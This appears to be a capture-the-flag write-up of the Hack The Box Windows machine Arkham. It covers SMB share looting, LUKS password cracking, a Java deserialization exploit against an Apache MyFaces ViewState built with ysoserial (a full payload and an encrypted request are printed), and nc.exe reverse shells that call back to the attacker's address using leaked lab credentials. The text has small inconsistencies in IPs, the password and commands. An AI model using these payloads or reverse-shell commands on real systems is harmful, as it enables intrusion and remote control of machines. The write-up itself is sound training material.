Hack The Box Arkham Detailed Writeup | 10.10.10.130

Arkham is a medium difficulty machine, which is now retired. Here in this post, you can learn the intended way of exploiting this Windows machine.

Once the Exploitation is done, you will learn the following skills.

● How To Java Deserialization in Windows Machine

ENUMERATION

Lets start with enumerating

nmap -sV -sT -sC arkham.htb

HERE IS THE NMAP OUTPUT

➜  arkham nmap -sV -sT -sC arkham.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-08 18:54 +03
Nmap scan report for arkham.htb (10.10.10.130)
Host is up (0.18s latency).
Not shown: 995 filtered ports
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
8080/tcp open  http          Apache Tomcat 8.5.37
| http-methods: 
|_  Potentially risky methods: PUT DELETE
|_http-title: Mask Inc.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-11-08T15:54:59
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 76.83 seconds
➜  arkham 

So, nmap revealed I have an IIS on port 80, an Apache in port 8080 and SMB enabled. So l immediately went to see what SMB has in the box. From my previous experience, the SMB is what I prefer to enumerate first.

➜  arkham smbclient -L //10.10.10.130 
Enter WORKGROUP\root's password: 

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	BatShare        Disk      Master Wayne's secrets
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	Users           Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.130 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available

There is a share Batshare seem to be having some kind of secrets as per the description. lets go deeper and see what it contains.

➜  arkham smbclient -N \\\\10.10.10.130\\BatShare
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Feb  3 16:00:10 2019
  ..                                  D        0  Sun Feb  3 16:00:10 2019
  appserver.zip                       A  4046695  Fri Feb  1 09:13:37 2019

		5158399 blocks of size 4096. 2130498 blocks available
smb: \> 

The share contains a compressed file called appserver.zip. I used the get command to download the folder to my local machine to see what it contains.

➜  arkham smbclient -N \\\\10.10.10.130\\BatShare
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Feb  3 16:00:10 2019
  ..                                  D        0  Sun Feb  3 16:00:10 2019
  appserver.zip                       A  4046695  Fri Feb  1 09:13:37 2019

		5158399 blocks of size 4096. 2130498 blocks available
smb: \> get appserver.zip
getting file \appserver.zip of size 4046695 as appserver.zip (780.2 KiloBytes/sec) (average 780.2 KiloBytes/sec)
smb: \> 

There are 2 files inside, a text file that reads “lfred, this is the backup image from our linux server. Please see that The Joker or anyone else doesn’t have unauthenticated access to it. – Bruce ” and an encrypted image “backup.img”.

➜  arkham file backup.img 
backup.img: LUKS encrypted file, ver 1 [aes, xts-plain64, sha256] UUID: d931ebb1-5edc-4453-8ab1-3d23bb85b38e
➜  arkham 

After running hashcat to crack the password of backup.img using rockyou.txt I found the password as batmanforever.

➜  arkham -m 14600 -a 0 backup.img /usr/share/wordlists/rockyou.txt
batmanforever

I will mount the image file and see what it contains using the password I found in the above step.

➜  arkham cryptsetup luksOpen backup.img arkham 
➜  arkham cryptsetup -v status arkham
/dev/mapper/arkham is active and is in use.
  type:    LUKS1
  cipher:  aes-xts-plain64
  keysize: 256 bits
  key location: dm-crypt
  device:  /dev/loop0
  loop:    /root/htb/arkham/backup.img
  sector size:  512
  offset:  4096 sectors
  size:    22528 sectors
  mode:    read/write
Command successful.
➜  arkham 

The mount has the script of the film Batman Begins, some pictures and some Tomcat “stuff”.

➜  af474e94-894e-4bb6-897a-adc82884b3d8 ls -laR
.:
total 18
drwxr-xr-x  4 root root  1024 Dec 25  2018 .
drwxr-x---+ 3 root root  4096 Nov  8 19:49 ..
drwx------  2 root root 12288 Dec 25  2018 lost+found
drwxrwxr-x  4 root root  1024 Dec 25  2018 Mask

./lost+found:
total 13
drwx------ 2 root root 12288 Dec 25  2018 .
drwxr-xr-x 4 root root  1024 Dec 25  2018 ..

./Mask:
total 882
drwxrwxr-x 4 root root   1024 Dec 25  2018 .
drwxr-xr-x 4 root root   1024 Dec 25  2018 ..
drwxr-xr-x 2 root root   1024 Dec 25  2018 docs
-rw-rw-r-- 1 root root  96978 Dec 25  2018 joker.png
-rw-rw-r-- 1 root root 105374 Dec 25  2018 me.jpg
-rw-rw-r-- 1 root root 687160 Dec 25  2018 mycar.jpg
-rw-rw-r-- 1 root root   7586 Dec 25  2018 robin.jpeg
drwxr-xr-x 2 root root   1024 Dec 25  2018 tomcat-stuff

./Mask/docs:
total 198
drwxr-xr-x 2 root root   1024 Dec 25  2018 .
drwxrwxr-x 4 root root   1024 Dec 25  2018 ..
-rw-r--r-- 1 root root 199998 Jun 15  2017 Batman-Begins.pdf

./Mask/tomcat-stuff:
total 193
drwxr-xr-x 2 root root   1024 Dec 25  2018 .
drwxrwxr-x 4 root root   1024 Dec 25  2018 ..
-rw-r--r-- 1 root root   1368 Dec 25  2018 context.xml
-rw-r--r-- 1 root root    832 Dec 25  2018 faces-config.xml
-rw-r--r-- 1 root root   1172 Dec 25  2018 jaspic-providers.xml
-rw-r--r-- 1 root root     39 Dec 25  2018 MANIFEST.MF
-rw-r--r-- 1 root root   7678 Dec 25  2018 server.xml
-rw-r--r-- 1 root root   2208 Dec 25  2018 tomcat-users.xml
-rw-r--r-- 1 root root 174021 Dec 25  2018 web.xml
-rw-r--r-- 1 root root   3498 Dec 25  2018 web.xml.bak
➜  af474e94-894e-4bb6-897a-adc82884b3d8 

After going through files, I found web.xml.bak a little interesting, let’s see what it contains;

<description>State saving method: 'client' or 'server' (=default). See JSF Specification 2.5.2</description>
<param-name>javax.faces.STATE_SAVING_METHOD</param-name>
<param-value>server</param-value>
</context-param>
<context-param>
<param-name>org.apache.myfaces.SECRET</param-name>
<param-value>SnNGOTg3Ni0=</param-value>
</context-param>
    <context-param>
        <param-name>org.apache.myfaces.MAC_ALGORITHM</param-name>
        <param-value>HmacSHA1</param-value>
     </context-param>
<context-param>
<param-name>org.apache.myfaces.MAC_SECRET</param-name>
<param-value>SnNGOTg3Ni0=</param-value>
</context-param>
<context-param>
<description>

Well, I found a couple of “secrets”. I’m still unware where this secrets are applied for, so I moved-on to find other services in the box which might helpful. The port:80 has IIS running and port:8080 has a custom website named “mask”

There are a couple of links in the Mask website, a subscribe to us has an input so I added my name as email and clicked sign up, I got a confirmation saying my email “nav1n” has been registered – well, this looks like loosely configured as the form doesn’t validate the email id, lets find if I could exploit it! Also, I found out the page seems to be an Apache MyFaces instance. I wanted to see what happens after I sign-up, so I used BURP to intercept the request and see what are the responces I get from the webserver?

BURP SUIT REQUEST

POST /userSubscribe.faces HTTP/1.1
Host: arkham.htb:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://arkham.htb:8080/userSubscribe.faces
Content-Type: application/x-www-form-urlencoded
Content-Length: 258
Cooie: JSESSIONID=52065CE14788D74374FCA8513A733E2C
Connection: close
Upgrade-Insecure-Requests: 1
j_id_jsp_1623871077_1%3Aemail=nav1n&j_id_jsp_1623871077_1%3Asubmit=SIGN+UP&j_id_jsp_1623871077_1_SUBMIT=1&javax.faces.ViewState=wHo0wmLu5ceItIi%2BI7XkEi1GAb4h12WZ894pA%2BZ4OH7bco2jXEy1RUcOXXNAvTSC70KtDtngjDm0mNzA9qHjYerxo0jW7zu1a6WhnEtXrTblezs7Z7sOU6L5UMg%3D

I found a couple of hints in the HTB forum that saying this request holds a java serialized object, which is a potential deserialization vulnerability. I seem to have cracked the way in, let us dig more about this Apache MyFaces thing which I never had experience. I found this article https://myfaces.apache.org/core20/myfaces-impl-shared/apidocs/org/apache/myfaces/shared/util/StateUtils.html more useful.

The xml backup file I found in the mount is related tho this, after some brainstorming, I understood that this page uses encrypted viewstates from the web.xml.bak I found earlier.

These are the things I collected so far.

  • STATE_SAVING_METHOD: Saved in the server-side.
  • SECRET: SnNGOTg3Ni0= (The secret I found in ther xml file)
  • MAC_ALGORITHM: HmacSHA1
  • ENCRYPTION_ALGORITHM: DES (default)
  • PADDING: PKCS5 (default)

PAYLOAD GENERATION

I’m going to use YSoSerial to create a serialized payloads.

It won’t work if I send directly, it has to be encrypted.

Command:

➜  arkham java -jar /root/ysoserial-master-SNAPSHOT.jar CommonsCollections1 "ping 10.10.14.31" | base64 -w 0
rO0ABXNyADJzdW4ucmVmbGVjdC5hbm5vdGF0aW9uLkFubm90YXRpb25JbnZvY2F0aW9uSGFuZGxlclXK9Q8Vy36lAgACTAAMbWVtYmVyVmFsdWVzdAAPTGphdmEvdXRpbC9NYXA7TAAEdHlwZXQAEUxqYXZhL2xhbmcvQ2xhc3M7eHBzfQAAAAEADWphdmEudXRpbC5NYXB4cgAXamF2YS5sYW5nLnJlZmxlY3QuUHJveHnhJ9ogzBBDywIAAUwAAWh0ACVMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvbkhhbmRsZXI7eHBzcQB+AABzcgAqb3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLm1hcC5MYXp5TWFwbuWUgp55EJQDAAFMAAdmYWN0b3J5dAAsTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHNyADpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ2hhaW5lZFRyYW5zZm9ybWVyMMeX7Ch6lwQCAAFbAA1pVHJhbnNmb3JtZXJzdAAtW0xvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHB1cgAtW0xvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuVHJhbnNmb3JtZXI7vVYq8dg0GJkCAAB4cAAAAAVzcgA7b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNvbnN0YW50VHJhbnNmb3JtZXJYdpARQQKxlAIAAUwACWlDb25zdGFudHQAEkxqYXZhL2xhbmcvT2JqZWN0O3hwdnIAEWphdmEubGFuZy5SdW50aW1lAAAAAAAAAAAAAAB4cHNyADpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuSW52b2tlclRyYW5zZm9ybWVyh+j/a3t8zjgCAANbAAVpQXJnc3QAE1tMamF2YS9sYW5nL09iamVjdDtMAAtpTWV0aG9kTmFtZXQAEkxqYXZhL2xhbmcvU3RyaW5nO1sAC2lQYXJhbVR5cGVzdAASW0xqYXZhL2xhbmcvQ2xhc3M7eHB1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAACdAAKZ2V0UnVudGltZXVyABJbTGphdmEubGFuZy5DbGFzczurFteuy81amQIAAHhwAAAAAHQACWdldE1ldGhvZHVxAH4AHgAAAAJ2cgAQamF2YS5sYW5nLlN0cmluZ6DwpDh6O7NCAgAAeHB2cQB+AB5zcQB+ABZ1cQB+ABsAAAACcHVxAH4AGwAAAAB0AAZpbnZva2V1cQB+AB4AAAACdnIAEGphdmEubGFuZy5PYmplY3QAAAAAAAAAAAAAAHhwdnEAfgAbc3EAfgAWdXIAE1tMamF2YS5sYW5nLlN0cmluZzut0lbn6R17RwIAAHhwAAAAAXQAEHBpbmcgMTAuMTAuMTYuMTV0AARleGVjdXEAfgAeAAAAAXEAfgAjc3EAfgARc3IAEWphdmEubGFuZy5JbnRlZ2VyEuKgpPeBhzgCAAFJAAV2YWx1ZXhyABBqYXZhLmxhbmcuTnVtYmVyhqyVHQuU4IsCAAB4cAAAAAFzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAAdwgAAAAQAAAAAHh4dnIAEmphdmEubGFuZy5PdmVycmlkZQAAAAAAAAAAAAAAeHBxAH4AOg==#                       ➜  arkham 

INSTALLING ysoserial-master-SNAPSHOT.jar To Create Payload

wget https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar

➜  ~ java -jar ysoserial-master-SNAPSHOT.jar
Y SO SERIAL?
Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]'
  Available payload types:
Nov 08, 2019 9:32:09 PM org.reflections.Reflections scan
INFO: Reflections took 439 ms to scan 1 urls, producing 18 keys and 146 values 
     Payload             Authors                                Dependencies                                                                                                                                                                                        
     -------             -------                                ------------                                                                                                                                                                                        
     BeanShell1          @pwntester, @cschneider4711            bsh:2.0b5                                                                                                                                                                                           
     C3P0                @mbechler                              c3p0:0.9.5.2, mchange-commons-java:0.2.11                                                                                                                                                           
     Clojure             @JackOfMostTrades                      clojure:1.8.0                                                                                                                                                                                       
     CommonsBeanutils1   @frohoff                               commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2                                                                                                                               
     CommonsCollections1 @frohoff                               commons-collections:3.1                                                                                                                                                                             
     CommonsCollections2 @frohoff                               commons-collections4:4.0                                                                                                                                                                            
     CommonsCollections3 @frohoff                               commons-collections:3.1                                                                                                                                                                             
     CommonsCollections4 @frohoff                               commons-collections4:4.0                                                                                                                                                                            
     CommonsCollections5 @matthias_kaiser, @jasinner            commons-collections:3.1                                                                                                                                                                             
     CommonsCollections6 @matthias_kaiser                       commons-collections:3.1                                                                                                                                                                             
     CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1                                                                                                                                                                             
     FileUpload1         @mbechler                              commons-fileupload:1.3.1, commons-io:2.4                                                                                                                                                            
     Groovy1             @frohoff                               groovy:2.3.9                                                                                                                                                                                        
     Hibernate1          @mbechler                                                                                                                                                                                                                                  
     Hibernate2          @mbechler                                                                                                                                                                                                                                  
     JBossInterceptors1  @matthias_kaiser                       javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21                                            
     JRMPClient          @mbechler                                                                                                                                                                                                                                  
     JRMPListener        @mbechler                                                                                                                                                                                                                                  
     JSON1               @mbechler                              json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
     JavassistWeld1      @matthias_kaiser                       javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21                                                        
     Jdk7u21             @frohoff                                                                                                                                                                                                                                   
     Jython1             @pwntester, @cschneider4711            jython-standalone:2.5.2                                                                                                                                                                             
     MozillaRhino1       @matthias_kaiser                       js:1.7R2                                                                                                                                                                                            
     MozillaRhino2       @_tint0                                js:1.7R2                                                                                                                                                                                            
     Myfaces1            @mbechler                                                                                                                                                                                                                                  
     Myfaces2            @mbechler                                                                                                                                                                                                                                  
     ROME                @mbechler                              rome:1.0                                                                                                                                                                                            
     Spring1             @frohoff                               spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE                                                                                                                                               
     Spring2             @mbechler                              spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2                                                                                                           
     URLDNS              @gebl                                                                                                                                                                                                                                      
     Vaadin1             @kai_ullrich                           vaadin-server:7.7.14, vaadin-shared:7.7.14                                                                                                                                                          
     Wicket1             @jacob-baines                          wicket-util:6.23.0, slf4j-api:1.6.4                                                                                                                                                                 
➜  ~ 

Now, the plan is Create a Base64 decode the secret ==> create the ysoserial payload ==> encrypt the payload with the decoded secret using DES and PKCS5 padding ==> create a HmacSHA1 signature of the encrypted value and the secret ==> encrypt payload ==> Expoloit

The script I made to see if I can do a RCE to the box was successful, I do have RCE on the box. I started to listen tcpdump see the result.

EXPLOIT:

➜  arkham python nav1n.py
Error while generating or serializing payload
java.lang.IllegalArgumentException: Command format is: <base_url>:<classname>
	at ysoserial.payloads.C3P0.getObject(C3P0.java:48)
	at ysoserial.GeneratePayload.main(GeneratePayload.java:34)
Error while generating or serializing payload
java.lang.IllegalArgumentException: Unsupported command ping 10.10.14.35 [ping 10.10.14.35]
	at ysoserial.payloads.FileUpload1.getObject(FileUpload1.java:71)
	at ysoserial.payloads.FileUpload1.getObject(FileUpload1.java:40)
	at ysoserial.GeneratePayload.main(GeneratePayload.java:34)
WARNING: An illegal reflective access operation has occurred
WARNING: Illegal reflective access by org.codehaus.groovy.reflection.CachedClass$3$1 (file:/opt/ysoserial-master-SNAPSHOT.jar) to method java.lang.Object.finalize()
WARNING: Please consider reporting this to the maintainers of org.codehaus.groovy.reflection.CachedClass$3$1

RCE EXPLOIT CONFIRMATION

➜  ~ tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
21:54:41.258850 IP arkham.htb > ns09: ICMP echo request, id 1, seq 9, length 40
21:54:41.258867 IP ns09 > arkham.htb: ICMP echo reply, id 1, seq 9, length 40
21:54:42.203633 IP arkham.htb > ns09: ICMP echo request, id 1, seq 10, length 40
21:54:42.203653 IP ns09 > arkham.htb: ICMP echo reply, id 1, seq 10, length 40
21:54:43.206836 IP arkham.htb > ns09: ICMP echo request, id 1, seq 11, length 40
21:54:43.206911 IP ns09 > arkham.htb: ICMP echo reply, id 1, seq 11, length 40
21:54:43.268574 IP arkham.htb > ns09: ICMP echo request, id 1, seq 12, length 40
21:54:43.268628 IP ns09 > arkham.htb: ICMP echo reply, id 1, seq 12, length 40
21:54:44.414674 IP arkham.htb > ns09: ICMP echo request, id 1, seq 13, length 40
21:54:44.414698 IP ns09 > arkham.htb: ICMP echo reply, id 1, seq 13, length 40
21:54:44.414722 IP arkham.htb > ns09: ICMP echo request, id 1, seq 14, length 40
21:54:44.414730 IP ns09 > arkham.htb: ICMP echo reply, id 1, seq 14, length 40
21:54:45.353063 IP arkham.htb > ns09: ICMP echo request, id 1, seq 15, length 40
21:54:45.353104 IP ns09 > arkham.htb: ICMP echo reply, id 1, seq 15, length 40
21:54:46.311118 IP arkham.htb > ns09: ICMP echo request, id 1, seq 16, length 40
21:54:46.311168 IP ns09 > arkham.htb: ICMP echo reply, id 1, seq 16, length 40

So, once the payloads are ready, start the SimpleHTTPServer to upload nc.exe and I started my listener on port 4444, then I sent the payloads.

HERE IS THE RESPONSE:

POST /userSubscribe.faces HTTP/1.1
Host: arkham.htb:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://arkham.htb:8080/userSubscribe.faces
Content-Type: application/x-www-form-urlencoded
Content-Length: 3197
Cookie: JSESSIONID=xx
Connection: close
Upgrade-Insecure-Requests: 1

j_id_jsp_1623871077_1%3Aemail=test&j_id_jsp_1623871077_1%3Asubmit=SIGN+UP&j_id_jsp_1623871077_1_SUBMIT=1&javax.faces.ViewState=o4swGdxTZXw1mKtPxFkjUuWrKOBMVnhQ7RbMizpCb4xVYti30eaLecyiLLU7plNhjPFRnShy4IlIzxo0JHimBY3Uq1igjemgy0Ki4udfDHCBAJC2Yt%2BEq3hlEwGdEWrah3tqcdo5Gxzenm%2BTobetH0%2BaG8%2BiCEB1RbCm7b%2FRwuOINGcnD%2BFO3DfRKu9gMF%2Bhys2vYzpsGEyHK3knl7tEaywlBVCuHcXMqHLkcdxxT%2FxmSmtDFG85aQTVagEZSOEEX9bCEH73rYHKIdkiMmo3tRSv0aFcuTCzo9ywZEOE7bULbrBQyiDX34vkaoTgGwZx5xiJxcuYu0CBGPZRDq1UBGH1QEaZ391dmKFPiBhIqgml%2FErcnLpXhN2CNsbBu9HHKSuy0lTdaYJifqCf5zOXppnKQiTkInD9AN%2BIjrIKoKhLslblPlDOJTrY6IWKCYEH9ZL8tl0EWKQbiDEBanGkxqkFjjIIqXZFoV%2BTjkS1FnVO%2FoHWBB6y1rXJo3U1C5yWD2YmTWm4GDisEHwUAFbDTHvZSVfjA0tLKeDOxOM%2F8vhiJvs7XB%2FiL0xioZBCDhyyogM5ilMzKrxi25pKdV7qKFYgBIpi82HZJBiyt0w%2FfqlS6hjo07yHrHeKgVe5KiMmPRtt6h4buRWMlkPun2jgm259cO2loSVMSxjNu9%2FCCnMkGLK3TD9%2BqV2YP5mtCOlGyIG92TCIcaFw8tZsfH14qFQuvLXlje%2BWBoE1cgT2Ozo%2Bus8jmf0nBttP8g%2FGkIl6LoObMsC3BpXUjNHX%2Fl6ZpFrpHPYqF04R1vdMLtxFTMVOrQbaoakmK3uiTmx6KyVVK59aLaXuOysuH%2BsV3gx3v3PoFcpnc1%2BAJTHWKqHfCy1opEh7cDv2tdwg%2FTiZmJ7Y2965FPpV2Dw1mICArOvAOCf9fzZiZncI%2BCoX%2FOuaRilAYhWNKe8XzdQP6NjTNMEAoU8qpv%2FvNvILq22We0wQ1mUW3OrpauOZzU7%2BmQoL%2BGnNtOpmFx%2FzHz9CO1Qw3PfdQHYhQvw4tg%2FW90wu3EVMxVnQ5zD2tQV6GrCAJFCMnfi8x%2Bf6%2BnW9kb%2F3KJjeLP9EaVtnw4HgbxOvCM237bf506YkZewPgxQiLewUhIRMklMJnDnzAWGDt7FI7YRaUwB8JGXyetfsWfwktvElTU8G%2Fq7MLUp4%2BGPRDBvo6SMhFsfpnWDv02QaeNaSLMlE9boIJFbYlwyeLs9OWTCIP4cwrVmtcdeHaJalFuas%2BcLlmoyCpiYNGomoF2fGsKSBlO02H5aD7eIK4KEmO7jZE%2FsAoHMWWJfxo23t44S4ahSOeHfvlzJqhV2WT62diMizXDhDlWLlH5eRWvOufroUtk3jPS%2B%2F%2B6Ud4Bajai2yaRfDxHbTJgZ6IWsFXJmYIJXEh5ODaSShdwisWrLMFqobrL%2B3iOMkCTIPHpwTC4k4WjyVGoC3EmsS4trV68wenfb4asCPSZABGwnwfoqx6CHK%2BPGB13aRjo4KzHOVh7W5RxqOnjWWACJFXGhBny4XW4CootugK59aLaXuOyv6AM6KeF8cfH0GU8FiZ%2BF0wy6hHdRzv29OOgXpgJZaMjXVY9Qh34X7raWi1V1bOk3wI5mPW2oCG%2FHiPH0hgDaLJD%2F5rWumATBRhPfQdMukPUuvh7aBrYKhTjoF6YCWWjI11WPUId%2BF%2B62lotVdWzpNlg7XO%2BO71UXIulcb15uC4Uo%2FmVX%2BF55hhstnKpruvCRn1%2FE2U%2BSHSUwJwYQalMFkB3EYe3Bg0twUHB0FLdRlgk%2B1LfoOx%2BOAGABHbKLruPQnSgSaOr0QO7fs3ABDYpM%2B0brsRYoVq%2FxZrXHXh2iWpRbmrPnC5ZqMgqYmDRqJqBegTWtulqHIbfmX3cwmZtK73nCNfCh4bR8nU8ph%2B9dFQFQm3TB92LYOU%2Bo9ImRGT5ZxHsqO7r9vsYEY9lEOrVQEonBeV1772fxzAWY30P6lQjx7QKzqFpGw7VVu9x6xj4HqyzMw3srhBWpB1evb%2F2cj2VJfV2Ik%2Fe1XeDhxd98FCKdtuwD%2FhfhKKwyMHBLd%2B%2BTRSti5%2BPjgedH8VrYCDw%2Bh7TXbFuuzmic0Ejp%2FMdRQ2lgM7A1Zk2tN7LvOGYXm5vai2%2Fp9KNzcb82%2BWwUxFUNdG%2Fr%2B91Skv9JVChFgo1kBKZ5DSG9GVW0c93lwaDPZR8m2MdKuCGEIGysMjBwS3fvkWX6kL5w8G98g8evxDbfYkHzyF14jnr2kMvA1HZRyD2wcvsnF03HnathuuAfsXFi9nSS%2FwbSz1fz4k0TLI7Jwpbv6aAGFYU9IId4BaMaICpD4zmUdsKF%2FchdWUs7E65By387U2Ejeqn%2FY3UAanW9XVGnW1aWk9nG1iLSIviO15BJYS2423DKh2itxBdEkoL7a2k0YgPMLX%2BTweGj5FUR%2FlCPgQijAFFrHWRvjlEtsVNbr09Qek%2F0QE3yWXS1W%2FgaT%2B7VnbdN2xAhE%2B9N5PSzJudEi8q%2Fo29VPSGioyPZd%2FiNpmNoUDeaeXEVrvY0L%2FaRMkBoThhoybIwKm9JRORG5quVg7mI39K3ANZaw6BBLyJDVbXmOcpydaV%2BJ4ehZuDU5EJNCdYdlqpK5IUgV5VNtTWO9f9YgPaneg14o%2B53eYRjgAQvWxmK%2FVII6JP9zUlbTzD60JeAbleovB8fLJf0D3aUv3mla%2B%2FLyWEXo2NfiqjFqPb9b4NHR199UdBVp6X2nev37%2Ftu0vBXvZz%2Bls4886hDPhV3RdASjsJaoZPrEReF8f43oev%2Bx6ZHIUdkCdk5uThniTrXeAWImx1USbtujkG0xSYdfK%2Fs8Az9gV7hyTmqI0ewkaYsX9uSA%2F9wVoArXnRX%2FrTg7PxMp9hGNKQN%2Fklr%2BXyc%3D
=============

USER.TXT

nc -nlvp 4444
listening on [any] 444 ...
connect to [10.10.14.35] from (UNKNOWN) [10.10.10.130] 49991
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\tomcat\apache-tomcat-8.5.37\bin>whoami
whoami
arkham\alfred
C:\Users\Alfred\Desktop>type user.txt
type user.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Privilege Escalation FROM Alfred To ROOT

In Alfred’s backup directory I found a backup.zip file. I used netcat to download it to my local machine to unzip and analysis.

C:\Users\Alfred\Downloads\backups>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is FA90-3873

 Directory of C:\Users\Alfred\Downloads\backups

02/03/2019  08:41 AM    <DIR>          .
02/03/2019  08:41 AM    <DIR>          ..
02/03/2019  08:41 AM           124,257 backup.zip
               1 File(s)        124,257 bytes
               2 Dir(s)   7,414,816,768 bytes free

UNZIPPING backup.zip

➜  ~ cd htb/arkham unzip backup.zip 
Archive:  backup.zip
  inflating: alfred@arkham.local.ost  
root@kali:~/Desktop/HTB/boxes/arkham/backups# file alfred@arkham.local.ost 
alfred@arkham.local.ost: Microsoft Outlook email folder
root@kali:~/Desktop/HTB/boxes/arkham/backups# readpst alfred@arkham.local.ost 
Opening PST file and indexes...
Processing Folder "Deleted Items"
Processing Folder "Inbox"
Processing Folder "Outbox"
Processing Folder "Sent Items"
Processing Folder "Calendar"
Processing Folder "Contacts"
Processing Folder "Conversation Action Settings"
Processing Folder "Drafts"
Processing Folder "Journal"
Processing Folder "Junk E-Mail"
Processing Folder "Notes"
Processing Folder "Tasks"
Processing Folder "Sync Issues"
Processing Folder "RSS Feeds"
Processing Folder "Quick Step Settings"
  "alfred@arkham.local.ost" - 15 items done, 0 items skipped.
  "Calendar" - 0 items done, 3 items skipped.
Processing Folder "Conflicts"
Processing Folder "Local Failures"
Processing Folder "Server Failures"
  "Sync Issues" - 3 items done, 0 items skipped.
  "Inbox" - 0 items done, 7 items skipped.
  "Drafts" - 1 items done, 0 items skipped.
➜  ~ cd htb/arkham

In the “Drafts” folder I found a mail with an attached picture.

The email has a screenshot of command prompt with a password of user “Batman”

Using the credentials of Batman:Zx^#QX+T!123 lets see if I can escalate the privilages. Because I found that user Batman is the part of the Administrators group.

C:\Users>net user batman
net user batman
User name                    Batman
Full Name                    
Comment                      
User's comment               
Country/region code          001 (United States)
Account active               Yes
Account expires              Never

Password last set            2/3/2019 9:25:50 AM
Password expires             Never
Password changeable          2/3/2019 9:25:50 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   5/28/2019 1:52:48 AM
Logon hours allowed          All
Local Group Memberships      *Administrators       *Remote Management Use
            

So, in the next step I will use Powershell with the credentials batman: Zx^#QX+T!123 to get reverse shell

C:\>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\> $username = 'batman'
$username = 'batman'
PS C:\> $password = 'Zx^#QZX+T!123'
$password = 'Zx^#QZX+T!123'
PS C:\> $securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
PS C:\> $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
PS C:\> Invoke-command -computername ARKHAM -credential $credential -scriptblock { cmd.exe /c "C:\windows\system32\spool\drivers\color\nc.exe" -e cmd.exe 10.10.14.31 4444 }                                      
Invoke-command -computername ARKHAM -credential $credential -scriptblock { cmd.exe /c "C:\windows\system32\spool\drivers\color\nc.exe" -e cmd.exe 10.10.14.31 4444}

In the other hand I ran netcat to get reverse shell, but the Administrator user is still inaccessible.

-> htb/arkham nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.35 from (UNKNOWN) [10.10.10.130] 50106
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\Batman\Documents>whoami
whoami
arkham\batman
.......
C:\Users>cd Administrator
cd Administrator
